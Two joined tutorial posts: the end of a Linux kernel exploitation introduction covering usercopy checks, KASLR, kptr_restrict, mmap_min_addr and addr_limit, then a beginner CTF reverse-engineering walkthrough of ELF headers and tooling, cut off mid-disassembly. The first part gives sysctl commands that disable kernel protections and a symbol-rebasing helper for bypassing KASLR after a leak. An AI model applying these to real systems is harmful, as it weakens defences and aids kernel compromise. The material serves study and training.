        n = _copy_to_user(to, from, n);
    return n;
}

The check function is shown below. It first compares the compile-time object size against the requested size. If an overflow seems possible (which is unlikely of course, or is it?), it calls copy_overflow() when the length is not a compile-time constant, or otherwise __bad_copy_from() or __bad_copy_to() depending on the is_source boolean, and then returns false. If the size fits, it calls check_object_size() and returns true.

extern void __compiletime_error("copy source size is too small")
__bad_copy_from(void);
extern void __compiletime_error("copy destination size is too small")
__bad_copy_to(void);

static inline void copy_overflow(int size, unsigned long count)
{
    WARN(1, "Buffer overflow detected (%d < %lu)!\n", size, count);
}

static __always_inline bool
check_copy_size(const void *addr, size_t bytes, bool is_source)
{
    int sz = __compiletime_object_size(addr);
    if (unlikely(sz >= 0 && sz < bytes)) {
        if (!__builtin_constant_p(bytes))
            copy_overflow(sz, bytes);
        else if (is_source)
            __bad_copy_from();
        else
            __bad_copy_to();
        return false;
    }
    check_object_size(addr, bytes, is_source);
    return true;
}

check_object_size() is simply a wrapper around __check_object_size():
#ifdef CONFIG_HARDENED_USERCOPY
extern void __check_object_size(const void *ptr, unsigned long n,
                                bool to_user);

static __always_inline void check_object_size(const void *ptr, unsigned long n,
                                              bool to_user)
{
    if (!__builtin_constant_p(n))
        __check_object_size(ptr, n, to_user);
}
#else
static inline void check_object_size(const void *ptr, unsigned long n,
                                     bool to_user)
{ }
#endif

__check_object_size() performs additional checks: as the comment in the source says, the object must not be a kernel .text address or a bogus address, and it must be a safe heap or stack object.

void __check_object_size(const void *ptr, unsigned long n, bool to_user)
{
    if (static_branch_unlikely(&bypass_usercopy_checks))
        return;

    if (!n)
        return;

    check_bogus_address((const unsigned long)ptr, n, to_user);

    check_heap_object(ptr, n, to_user);

    switch (check_stack_object(ptr, n)) {
    case NOT_STACK:
        break;
    case GOOD_FRAME:
    case GOOD_STACK:
        return;
    default:
        usercopy_abort("process stack", NULL, to_user, 0, n);
    }

    check_kernel_text_object((const unsigned long)ptr, n, to_user);
}
EXPORT_SYMBOL(__check_object_size);

Together, these checks are enough to block classic buffer-overflow bugs. They can be disabled by commenting out the check and recompiling the module.

KASLR: Stands for Kernel Address Space Layout Randomization. It's similar to ASLR in userspace, which keeps the stack and heap addresses from being at the same location in two different runs (unless the attacker gets lucky), and to PIE, which targets the main binary's segments: text, data and bss. This protection randomizes the kernel segments (exception table, text, data…) at each boot. We previously disabled it by passing nokaslr on the kernel command line. To experiment with it, that option was removed and specific symbols in /proc/kallsyms were then fetched on two different runs.
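Fetching those symbols can also be scripted. The sketch below is only an illustration: kallsyms_lookup() and rebase() are hypothetical helper names, and the parser assumes the usual "address type name" layout of /proc/kallsyms. Keep in mind that the file only shows real addresses to a sufficiently privileged reader; otherwise every address reads as zero.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Scans kallsyms-formatted text ("<hex addr> <type> <name> [module]") for
 * `name`. On success stores the address in *addr and returns 0; returns -1
 * if the symbol is not present.
 */
int kallsyms_lookup(FILE *f, const char *name, unsigned long long *addr)
{
    char line[512], sym[256], type;
    unsigned long long a;

    assert(f != NULL && name != NULL && addr != NULL);
    rewind(f);
    while (fgets(line, sizeof line, f)) {
        if (sscanf(line, "%llx %c %255s", &a, &type, sym) == 3 &&
            strcmp(sym, name) == 0) {
            *addr = a;
            return 0;
        }
    }
    return -1;
}

/*
 * Given a leaked runtime .text base and two addresses taken from an
 * identical kernel build (its .text base and the symbol of interest),
 * returns where that symbol sits in the running, randomized kernel.
 */
unsigned long long rebase(unsigned long long leaked_text,
                          unsigned long long build_text,
                          unsigned long long build_sym)
{
    return leaked_text + (build_sym - build_text);
}
```

On a live system this would be called as kallsyms_lookup(fopen("/proc/kallsyms", "r"), "_stext", &addr), with the fopen() result checked first; running it across two boots shows the base moving while the differences between symbols stay fixed.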
First run: (screenshot not preserved)
Second run: (screenshot not preserved)

This shows that _stext and _sdata are assigned random addresses at boot time, whereas each end address is just the start address plus a size that doesn't change in this case (0x21dc0 for .data, 0x6184d1 for .text). Note that .data sits at a constant distance from .text. So if the attacker obtains the .text base address (through a leak), he can work out the location of every kernel symbol even without access to kallsyms, using RVAs (offsets), but he'll have to compile the target kernel on his own box to get them. This is used, for example, when SMEP is on and one has to go for ROP to disable it first, and then redirect execution to a shellcode placed in userspace (< TASK_SIZE).

kptr_restrict: This protection prevents kernel addresses from being exposed to the attacker. It stops the %pK format from dumping an address, and how it behaves depends on the kptr_restrict value (0, 1 or 2).

"Kernel Pointers: %pK 0x01234567 or 0x0123456789abcdef. For printing kernel pointers which should be hidden from unprivileged users. The behaviour of %pK depends on the kptr_restrict sysctl - see Documentation/sysctl/kernel.txt for more details."

This can be seen in kprobe_blacklist_seq_show(), which calls kallsyms_show_value() and, depending on the result, does or does not print the start and end addresses.
static int kprobe_blacklist_seq_show(struct seq_file *m, void *v)
{
    struct kprobe_blacklist_entry *ent =
        list_entry(v, struct kprobe_blacklist_entry, list);

    if (!kallsyms_show_value())
        seq_printf(m, "0x%px-0x%px\t%ps\n", NULL, NULL,
                   (void *)ent->start_addr);
    else
        seq_printf(m, "0x%px-0x%px\t%ps\n", (void *)ent->start_addr,
                   (void *)ent->end_addr, (void *)ent->start_addr);
    return 0;
}

What kallsyms_show_value() does is shown here:

int kallsyms_show_value(void)
{
    switch (kptr_restrict) {
    case 0:
        if (kallsyms_for_perf())
            return 1;
    case 1:
        if (has_capability_noaudit(current, CAP_SYSLOG))
            return 1;
    default:
        return 0;
    }
}

If kptr_restrict is 0, it calls kallsyms_for_perf() to check whether sysctl_perf_event_paranoid is smaller than or equal to 1, and returns 1 if so; if not, execution falls through to the next case. If kptr_restrict is 1 (or the previous check fell through), it checks whether CAP_SYSLOG is among the user's capabilities and returns 1 if it is. Otherwise, it returns 0.

Disabling this protection can be done by setting the content of /proc/sys/kernel/kptr_restrict to 0, or by using sysctl:

sysctl -w kernel.kptr_restrict=0

But watch out for perf_event_paranoid too: if it's > 1, it needs to be adjusted as well.
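The decision logic is easy to misread because of the missing break statements, so here is a small userspace model of it. This is a sketch that mirrors the switch shown above, with the three kernel-side inputs turned into plain parameters; show_value_model() is a hypothetical name, not a kernel function.

```c
#include <assert.h>
#include <stdbool.h>

/*
 * Userspace model of kallsyms_show_value(): returns 1 when addresses
 * would be shown, 0 when they would be hidden.
 */
int show_value_model(int kptr_restrict, int perf_event_paranoid,
                     bool has_cap_syslog)
{
    assert(kptr_restrict >= 0);

    switch (kptr_restrict) {
    case 0:
        /* kallsyms_for_perf(): true when perf_event_paranoid <= 1 */
        if (perf_event_paranoid <= 1)
            return 1;
        /* fall through: a paranoid setting can still be rescued by CAP_SYSLOG */
    case 1:
        if (has_cap_syslog)
            return 1;
        /* fall through */
    default:
        return 0;
    }
}
```

For instance, show_value_model(0, 2, false) is 0: with kptr_restrict at 0, an unprivileged user still sees nothing as long as perf_event_paranoid is above 1.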
This is an example on the default kernel run by my Debian VM:

user@Nwwz:~$ cd /proc/self
user@Nwwz:/proc/self$ cat stack
[<ffffffff81e7c869>] do_wait+0x1c9/0x240
[<ffffffff81e7d9ab>] SyS_wait4+0x7b/0xf0
[<ffffffff81e7b550>] task_stopped_code+0x50/0x50
[<ffffffff81e03b7d>] do_syscall_64+0x8d/0xf0
[<ffffffff8241244e>] entry_SYSCALL_64_after_swapgs+0x58/0xc6
[<ffffffffffffffff>] 0xffffffffffffffff

However, in the 4.17 kernel, we get this, because of perf_event_paranoid:

root@Nwwz:~# cd /proc/self
root@Nwwz:/proc/self# cat stack
[<0>] do_wait+0x1c9/0x240
[<0>] kernel_wait4+0x8d/0x140
[<0>] __do_sys_wait4+0x95/0xa0
[<0>] do_syscall_64+0x55/0x100
[<0>] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[<0>] 0xffffffffffffffff
root@Nwwz:/proc/self# cat /proc/sys/kernel/kptr_restrict
0
root@Nwwz:/proc/self# cat /proc/sys/kernel/perf_event_paranoid
2

mmap_min_addr: The mm_struct within task_struct holds a function pointer called get_unmapped_area.

struct mm_struct {
    ...
#ifdef CONFIG_MMU
    unsigned long (*get_unmapped_area) (struct file *filp,
            unsigned long addr, unsigned long len,
            unsigned long pgoff, unsigned long flags);
#endif
    ...
};

It is retrieved in get_unmapped_area(), which first takes it from the mm (mm_struct), then replaces it with the handler from the file's file_operations if the mapping is file-backed, or with shmem_get_unmapped_area() if there is no file and the MAP_SHARED flag is set.

Within the mm_struct, however, the default value of get_unmapped_area is the arch-specific function. This function searches for a memory block large enough to satisfy the request, but before returning the address it checks that it is greater than or equal to mmap_min_addr, which means that no address below that value will ever be handed out. This prevents NULL pointer dereference attacks: the NULL address cannot be mmapped, so nothing (shellcode, pointers…) can be stored there.

Disabling this protection can be done by setting the content of /proc/sys/vm/mmap_min_addr to 0, or by using sysctl like before:
sysctl -w vm.mmap_min_addr=0

addr_limit: The thread (thread_struct) within the task_struct contains some important fields; among them is addr_limit.

typedef struct {
    unsigned long seg;
} mm_segment_t;

struct thread_struct {
    ...
    mm_segment_t addr_limit;

    unsigned int sig_on_uaccess_err:1;
    unsigned int uaccess_err:1;
    ...
};

This can be read with a call to get_fs() and changed with set_fs():

#define MAKE_MM_SEG(s)  ((mm_segment_t) { (s) })

#define KERNEL_DS       MAKE_MM_SEG(-1UL)
#define USER_DS         MAKE_MM_SEG(TASK_SIZE_MAX)

#define get_ds()        (KERNEL_DS)
#define get_fs()        (current->thread.addr_limit)
static inline void set_fs(mm_segment_t fs)
{
    current->thread.addr_limit = fs;
    set_thread_flag(TIF_FSCHECK);
}

When a userspace-supplied address is accessed, it is checked against this limit first, so overwriting it with -1UL (KERNEL_DS) would give you read and write access to kernel space.

This was the introduction. I noticed that it had grown bigger than I expected, so I stopped, and removed the parts about protections, side-channel attacks and others.

Starting this was possible thanks to: @_py(DA BEST), @pry0cc, @Evalion, @4w1il, @ricksanchez and @Leeky.

See y'all in part 1, peace.

"nothing is enough, search more to learn more". ~ exploit

Source: https://0x00sec.org/t/point-of-no-c3-linux-kernel-exploitation-part-0/11585
Linux Reverse Engineering CTFs for Beginners

After a while, I decided to write a short blog post about Linux binary reversing CTFs in general: how a beginner can approach a binary and solve it. I personally am not a fan of Linux reverse engineering challenges, since I spend more time on Windows reversing and like those challenges more. One reason I prefer Windows is that, as a pentester, I encounter Windows machines daily, and it's rare that I come across an entire network running Linux. Even when it comes to exploit development, it's pretty rare that you will manually develop an exploit for Linux software while pentesting. But this knowledge is really useful when it comes to IoT, since so many devices are based on embedded Linux. If you want to begin reverse engineering and exploit development, starting from Linux is a good idea. I too started from Linux many years ago. I say that because some people try to run away the moment they see a reverse engineering challenge. So if you are a newbie, I hope this content is a useful place to begin.

The ELF Format

Let's first have a look at the ELF headers. The best way to learn about them in detail is to check the man pages for ELF. Here it is in more detail. The "e_shoff" member holds the offset to the section header table. The "sh_offset" member holds the file offset of the section's first byte.

                 +-------------------+
                 | ELF header        |---+
+--------------> +-------------------+   | e_shoff
|                |                   |<--+
| Section        | Section header 0  |
|                |                   |---+ sh_offset
| Header         +-------------------+   |
|                | Section header 1  |---|--+ sh_offset
| Table          +-------------------+   |  |
|                | Section header 2  |---|--|--+
+--------------> +-------------------+   |  |  |
                 | Section 0         |<--+  |  |
                 +-------------------+      |  | sh_offset
                 | Section 1         |<-----+  |
                 +-------------------+         |
                 | Section 2         |<--------+
                 +-------------------+

Executable Header

Any ELF file starts with an executable header.
This contains information such as the type of the ELF file and the offsets to the different headers. Everything is self-explanatory if you look at the comments. For this example, I am using the 32-bit structures. For x86_64 the sizes change and the names start with "Elf64_".

#define EI_NIDENT (16)

typedef struct
{
  unsigned char e_ident[EI_NIDENT];     /* Magic number and other info */
  Elf32_Half    e_type;                 /* Object file type */
  Elf32_Half    e_machine;              /* Architecture */
  Elf32_Word    e_version;              /* Object file version */
  Elf32_Addr    e_entry;                /* Entry point virtual address */
  Elf32_Off     e_phoff;                /* Program header table file offset */
  Elf32_Off     e_shoff;                /* Section header table file offset */
  Elf32_Word    e_flags;                /* Processor-specific flags */
  Elf32_Half    e_ehsize;               /* ELF header size in bytes */
  Elf32_Half    e_phentsize;            /* Program header table entry size */
  Elf32_Half    e_phnum;                /* Program header table entry count */
  Elf32_Half    e_shentsize;            /* Section header table entry size */
  Elf32_Half    e_shnum;                /* Section header table entry count */
  Elf32_Half    e_shstrndx;             /* Section header string table index */
} Elf32_Ehdr;

This is an example using readelf.
# readelf -h /bin/ls
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x6130
  Start of program headers:          64 (bytes into file)
  Start of section headers:          137000 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         11
  Size of section headers:           64 (bytes)
  Number of section headers:         29
  Section header string table index: 28

To calculate the size of the entire binary we can use the following calculation, which works here because the section header table is the last thing in the file:

size = e_shoff + (e_shnum * e_shentsize)
size = Start of section headers + (Number of section headers * Size of section headers)
size = 137000 + (29*64) = 138856

As you can see, our calculation is correct.

# ls -l /bin/ls
-rwxr-xr-x 1 root root 138856 Aug 29 21:20 /bin/ls

Program Headers

These headers describe the segments of the binary, which are important for loading it. The kernel uses this information to map the segments from disk into memory. The members of the structure are self-explanatory. I won't explain them in depth in this post, as I am trying to keep things basic. However, every one of them is worth understanding if you want to do cool things when reversing ELF files.

typedef struct
{
  Elf32_Word    p_type;                 /* Segment type */
  Elf32_Off     p_offset;               /* Segment file offset */
  Elf32_Addr    p_vaddr;                /* Segment virtual address */
  Elf32_Addr    p_paddr;                /* Segment physical address */
  Elf32_Word    p_filesz;               /* Segment size in file */
  Elf32_Word    p_memsz;                /* Segment size in memory */
  Elf32_Word    p_flags;                /* Segment flags */
  Elf32_Word    p_align;                /* Segment alignment */
} Elf32_Phdr;

Section Headers

These headers contain the information for the binary's sections. They describe each section's size and location, for linking and debugging purposes.
These headers are not really important for the execution flow of the binary. In some cases they are stripped, and tools like gdb and objdump become useless, as they rely on these headers to locate symbol information.

typedef struct
{
  Elf32_Word    sh_name;                /* Section name (string tbl index) */
  Elf32_Word    sh_type;                /* Section type */
  Elf32_Word    sh_flags;               /* Section flags */
  Elf32_Addr    sh_addr;                /* Section virtual addr at execution */
  Elf32_Off     sh_offset;              /* Section file offset */
  Elf32_Word    sh_size;                /* Section size in bytes */
  Elf32_Word    sh_link;                /* Link to another section */
  Elf32_Word    sh_info;                /* Additional section information */
  Elf32_Word    sh_addralign;           /* Section alignment */
  Elf32_Word    sh_entsize;             /* Entry size if section holds table */
} Elf32_Shdr;

Sections

Like any binary format, ELF is divided into sections. Some of them will look familiar if you know the PE format. However, I won't be discussing all the sections, as I am trying to keep it basic.

.bss Section
This section contains the program's uninitialized global data.

.data Section
This section contains the program's initialized global variables.

.rodata Section
This section contains read-only data, such as the strings used by the program.

.text Section
This section contains the program's actual code, the logic flow.
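To see how e_shoff, e_shstrndx and sh_offset fit together, the section header table can be walked by hand. The following is a minimal sketch rather than a replacement for readelf: it assumes a Linux system with <elf.h>, handles only 64-bit ELF files in the host's byte order, and list_sections() is a name made up for this example.

```c
#include <assert.h>
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Prints index, name, file offset and size of every section in a 64-bit
 * ELF file. Returns the number of section headers, or -1 on any error.
 */
int list_sections(const char *path)
{
    Elf64_Ehdr eh;
    Elf64_Shdr *sh = NULL;
    char *names = NULL;
    size_t strsz = 0;
    int count = -1;
    FILE *f;

    assert(path != NULL);
    f = fopen(path, "rb");
    if (!f)
        return -1;

    /* The executable header sits at offset 0 and starts with "\177ELF". */
    if (fread(&eh, sizeof eh, 1, f) != 1 ||
        memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 ||
        eh.e_shentsize != sizeof(Elf64_Shdr) ||
        eh.e_shnum == 0 || eh.e_shstrndx >= eh.e_shnum)
        goto out;

    /* e_shoff is the file offset of the section header table. */
    sh = calloc(eh.e_shnum, sizeof *sh);
    if (!sh || fseek(f, (long)eh.e_shoff, SEEK_SET) != 0 ||
        fread(sh, sizeof *sh, eh.e_shnum, f) != eh.e_shnum)
        goto out;

    /* Section names live in the string table at index e_shstrndx. */
    strsz = (size_t)sh[eh.e_shstrndx].sh_size;
    names = malloc(strsz + 1);
    if (!names ||
        fseek(f, (long)sh[eh.e_shstrndx].sh_offset, SEEK_SET) != 0 ||
        fread(names, 1, strsz, f) != strsz)
        goto out;
    names[strsz] = '\0';

    for (int i = 0; i < eh.e_shnum; i++) {
        /* sh_name is an index into the string table, not a pointer. */
        const char *name = sh[i].sh_name < strsz ? names + sh[i].sh_name : "?";
        printf("[%2d] %-20s off=0x%06llx size=0x%06llx\n", i, name,
               (unsigned long long)sh[i].sh_offset,
               (unsigned long long)sh[i].sh_size);
    }
    count = eh.e_shnum;

out:
    free(names);
    free(sh);
    fclose(f);
    return count;
}
```

Calling list_sections("/bin/ls") should list the same names that readelf -S reports for that file, just with fewer columns.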
# readelf -S --wide /bin/ls
There are 29 section headers, starting at offset 0x21728:

Section Headers:
  [Nr] Name               Type       Address          Off    Size   ES Flg Lk Inf Al
  [ 0]                    NULL       0000000000000000 000000 000000 00      0   0  0
  [ 1] .interp            PROGBITS   00000000000002a8 0002a8 00001c 00   A  0   0  1
  [ 2] .note.ABI-tag      NOTE       00000000000002c4 0002c4 000020 00   A  0   0  4
  [ 3] .note.gnu.build-id NOTE       00000000000002e4 0002e4 000024 00   A  0   0  4
  [ 4] .gnu.hash          GNU_HASH   0000000000000308 000308 0000c0 00   A  5   0  8
  [ 5] .dynsym            DYNSYM     00000000000003c8 0003c8 000c90 18   A  6   1  8
  [ 6] .dynstr            STRTAB     0000000000001058 001058 0005d8 00   A  0   0  1
  [ 7] .gnu.version       VERSYM     0000000000001630 001630 00010c 02   A  5   0  2
  [ 8] .gnu.version_r     VERNEED    0000000000001740 001740 000070 00   A  6   1  8
  [ 9] .rela.dyn          RELA       00000000000017b0 0017b0 001350 18   A  5   0  8
  [10] .rela.plt          RELA       0000000000002b00 002b00 0009f0 18  AI  5  24  8
  [11] .init              PROGBITS   0000000000004000 004000 000017 00  AX  0   0  4
  [12] .plt               PROGBITS   0000000000004020 004020 0006b0 10  AX  0   0 16
  [13] .plt.got           PROGBITS   00000000000046d0 0046d0 000018 08  AX  0   0  8
  [14] .text              PROGBITS   00000000000046f0 0046f0 01253e 00  AX  0   0 16
  [15] .fini              PROGBITS   0000000000016c30 016c30 000009 00  AX  0   0  4
  [16] .rodata            PROGBITS   0000000000017000 017000 005129 00   A  0   0 32
  [17] .eh_frame_hdr      PROGBITS   000000000001c12c 01c12c 0008fc 00   A  0   0  4
  [18] .eh_frame          PROGBITS   000000000001ca28 01ca28 002ed0 00   A  0   0  8
  [19] .init_array        INIT_ARRAY 0000000000021390 020390 000008 08  WA  0   0  8
  [20] .fini_array        FINI_ARRAY 0000000000021398 020398 000008 08  WA  0   0  8
  [21] .data.rel.ro       PROGBITS   00000000000213a0 0203a0 000a38 00  WA  0   0 32
  [22] .dynamic           DYNAMIC    0000000000021dd8 020dd8 0001f0 10  WA  6   0  8
  [23] .got               PROGBITS   0000000000021fc8 020fc8 000038 08  WA  0   0  8
  [24] .got.plt           PROGBITS   0000000000022000 021000 000368 08  WA  0   0  8
  [25] .data              PROGBITS   0000000000022380 021380 000268 00  WA  0   0 32
  [26] .bss               NOBITS     0000000000022600 0215e8 0012d8 00  WA  0   0 32
  [27] .gnu_debuglink     PROGBITS   0000000000000000 0215e8 000034 00      0   0  4
  [28] .shstrtab          STRTAB     0000000000000000 02161c 00010a 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  l (large), p (processor specific)

Solving a Basic CTF Challenge

Now that you have a basic understanding of the headers, let's pick a random CTF challenge and explore it. Download the binary from here. When we pass in some random string, the text "[+] No flag for you. [+]" is displayed.

# ./nix_5744af788e6cbdb29bb41e8b0e5f3cd5 aaaa

[+] No flag for you. [+]

Strings

Let's start by running strings and looking for anything interesting.

# strings nix_5744af788e6cbdb29bb41e8b0e5f3cd5
/lib/ld-linux.so.2
Mw1i#'0
libc.so.6
_IO_stdin_used
exit
sprintf
puts
strlen
__cxa_finalize
__libc_start_main
GLIBC_2.1.3
Y[^]
[^_]
UWVS
[^_]
Usage: script.exe <key>
Length of argv[1] too long.
[+] The flag is: SAYCURE{%s} [+]
[+] No flag for you. [+]
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
;*2$"
GCC: (Debian 8.2.0-8) 8.2.0
crtstuff.c

We found all the strings printed by the binary. The run of "%c" specifiers is the format string through which our flag gets printed; since there are 15 of them, the flag must be 15 characters long.

Usage: script.exe <key>
Length of argv[1] too long.
[+] The flag is: SAYCURE{%s} [+]
[+] No flag for you. [+]
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c

We can get a better view of these strings, together with their offsets, if we look at the '.rodata' section.

# readelf -x .rodata nix_5744af788e6cbdb29bb41e8b0e5f3cd5

Hex dump of section '.rodata':
  0x00002000 03000000 01000200 55736167 653a2073 ........Usage: s
  0x00002010 63726970 742e6578 65203c6b 65793e00 cript.exe <key>.
  0x00002020 4c656e67 7468206f 66206172 67765b31 Length of argv[1
  0x00002030 5d20746f 6f206c6f 6e672e00 5b2b5d20 ] too long..[+] 
  0x00002040 54686520 666c6167 2069733a 20534159 The flag is: SAY
  0x00002050 43555245 7b25737d 205b2b5d 0a000a5b CURE{%s} [+]...[
  0x00002060 2b5d204e 6f20666c 61672066 6f722079 +] No flag for y
  0x00002070 6f752e20 5b2b5d00 25632563 25632563 ou. [+].%c%c%c%c
  0x00002080 25632563 25632563 25632563 25632563 %c%c%c%c%c%c%c%c
  0x00002090 25632563 256300                     %c%c%c.

Checking for Symbols

By checking the symbols of the binary we can see that it uses the printf, puts, sprintf and strlen functions.

# nm -D nix_5744af788e6cbdb29bb41e8b0e5f3cd5
         w __cxa_finalize
         U exit
         w __gmon_start__
00002004 R _IO_stdin_used
         w _ITM_deregisterTMCloneTable
         w _ITM_registerTMCloneTable
         U __libc_start_main
         U printf
         U puts
         U sprintf
         U strlen

Tracing System Calls

We can use tools such as strace to trace the system calls used by the program.

# strace ./nix_5744af788e6cbdb29bb41e8b0e5f3cd5 aaaa
execve("./nix_5744af788e6cbdb29bb41e8b0e5f3cd5", ["./nix_5744af788e6cbdb29bb41e8b0e"..., "aaaa"], 0x7ffd5ff92d18 /* 46 vars */) = 0
strace: [ Process PID=59965 runs in 32 bit mode. ]
brk(NULL) = 0x56f14000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7ef0000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=220471, ...}) = 0
mmap2(NULL, 220471, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf7eba000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 \233\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1930924, ...}) = 0
mmap2(NULL, 1940000, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7ce0000
mprotect(0xf7cf9000, 1814528, PROT_NONE) = 0
mmap2(0xf7cf9000, 1359872, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x19000) = 0xf7cf9000
mmap2(0xf7e45000, 450560, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x165000) = 0xf7e45000
mmap2(0xf7eb4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d3000) = 0xf7eb4000
mmap2(0xf7eb7000, 10784, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf7eb7000
close(3) = 0
set_thread_area({entry_number=-1, base_addr=0xf7ef10c0, limit=0x0fffff, seg_32bit=1, contents=0, read_exec_only=0, limit_in_pages=1, seg_not_present=0, useable=1}) = 0 (entry_number=12)
mprotect(0xf7eb4000, 8192, PROT_READ) = 0
mprotect(0x5664d000, 4096, PROT_READ) = 0
mprotect(0xf7f1e000, 4096, PROT_READ) = 0
munmap(0xf7eba000, 220471) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}) = 0
brk(NULL) = 0x56f14000
brk(0x56f35000) = 0x56f35000
brk(0x56f36000) = 0x56f36000
write(1, "\n", 1
) = 1
write(1, "[+] No flag for you. [+]\n", 25[+] No flag for you. [+]
) = 25
exit_group(26) = ?
+++ exited with 26 +++

To get a better understanding, we can use ltrace to trace the library calls; the -C flag demangles C++ function names and -i prints the instruction pointer at each call. We can see that a string length check is being done.

# ltrace -i -C ./nix_5744af788e6cbdb29bb41e8b0e5f3cd5 aaaaaaaa
[0x565570e1] __libc_start_main(0x565571e9, 2, 0xffe3a584, 0x56557400 <unfinished ...>
[0x56557249] strlen("aaaaaaaa") = 8
[0x565572ca] puts("\n[+] No flag for you. [+]"
[+] No flag for you. [+]
) = 26
[0xffffffffffffffff] +++ exited (status 26) +++

Disassembling the Text Section

Let's have a look at the disassembly of the .text section and try to understand it. In this binary the symbols are not stripped, so we can see the function names, which makes things easier. If you can read assembly, by now you will have figured out what is happening. If not, let's do some live debugging to understand it better.

root@Omega:/mnt/hgfs/shared/Linux RE# objdump -D -M intel -j .text nix_5744af788e6cbdb29bb41e8b0e5f3cd5

nix_5744af788e6cbdb29bb41e8b0e5f3cd5:     file format elf32-i386

Disassembly of section .text:

000010b0 <_start>:
    10b0:  31 ed                 xor    ebp,ebp
    10b2:  5e                    pop    esi
    10b3:  89 e1                 mov    ecx,esp
    10b5:  83 e4 f0              and    esp,0xfffffff0
    10b8:  50                    push   eax
    10b9:  54                    push   esp
    10ba:  52                    push   edx
    10bb:  e8 22 00 00 00        call   10e2 <_start+0x32>
    10c0:  81 c3 40 2f 00 00     add    ebx,0x2f40
    10c6:  8d 83 60 d4 ff ff     lea    eax,[ebx-0x2ba0]
    10cc:  50                    push   eax
    10cd:  8d 83 00 d4 ff ff     lea    eax,[ebx-0x2c00]
    10d3:  50                    push   eax
    10d4:  51                    push   ecx
    10d5:  56                    push   esi
    10d6:  ff b3 f8 ff ff ff     push   DWORD PTR [ebx-0x8]
    10dc:  e8 9f ff ff ff        call   1080 <__libc_start_main@plt>
    10e1:  f4                    hlt
    10e2:  8b 1c 24              mov    ebx,DWORD PTR [esp]
    10e5:  c3                    ret
    10e6:  66 90                 xchg   ax,ax
    10e8:  66 90                 xchg   ax,ax
    10ea:  66 90                 xchg   ax,ax
    10ec:  66 90                 xchg   ax,ax
    10ee:  66 90                 xchg   ax,ax

... Output Omitted ...
000011e9 <main>:
    11e9:  8d 4c 24 04           lea    ecx,[esp+0x4]
    11ed:  83 e4 f0              and    esp,0xfffffff0
    11f0:  ff 71 fc              push   DWORD PTR [ecx-0x4]
    11f3:  55                    push   ebp
    11f4:  89 e5                 mov    ebp,esp
    11f6:  56                    push   esi
    11f7:  53                    push   ebx
    11f8:  51                    push   ecx
    11f9:  83 ec 1c              sub    esp,0x1c
    11fc:  e8 ef fe ff ff        call   10f0 <__x86.get_pc_thunk.bx>
    1201:  81 c3 ff 2d 00 00     add    ebx,0x2dff
    1207:  89 ce                 mov    esi,ecx
    1209:  c7 45 e4 00 00 00 00  mov    DWORD PTR [ebp-0x1c],0x0
    1210:  c7 45 dc 07 00 00 00  mov    DWORD PTR [ebp-0x24],0x7
    1217:  83 3e 02              cmp    DWORD PTR [esi],0x2
    121a:  74 1c                 je     1238 <main+0x4f>
    121c:  83 ec 0c              sub    esp,0xc
    121f:  8d 83 08 e0 ff ff     lea    eax,[ebx-0x1ff8]
    1225:  50                    push   eax
    1226:  e8 15 fe ff ff        call   1040 <printf@plt>
    122b:  83 c4 10              add    esp,0x10
    122e:  83 ec 0c              sub    esp,0xc
    1231:  6a 01                 push   0x1
    1233:  e8 28 fe ff ff        call   1060 <exit@plt>
    1238:  8b 46 04              mov    eax,DWORD PTR [esi+0x4]
    123b:  83 c0 04              add    eax,0x4
    123e:  8b 00                 mov    eax,DWORD PTR [eax]
    1240:  83 ec 0c              sub    esp,0xc
    1243:  50                    push   eax
    1244:  e8 27 fe ff ff        call   1070 <strlen@plt>
    1249:  83 c4 10              add    esp,0x10
    124c:  83 f8 0f              cmp    eax,0xf
    124f:  76 1c                 jbe    126d <main+0x84>
    1251:  83 ec 0c              sub    esp,0xc
    1254:  8d 83 20 e0 ff ff     lea    eax,[ebx-0x1fe0]
    125a:  50                    push   eax
    125b:  e8 f0 fd ff ff        call   1050 <puts@plt>
    1260:  83 c4 10              add    esp,0x10
    1263:  83 ec 0c              sub    esp,0xc
    1266:  6a 01                 push   0x1
    1268:  e8 f3 fd ff ff        call   1060 <exit@plt>
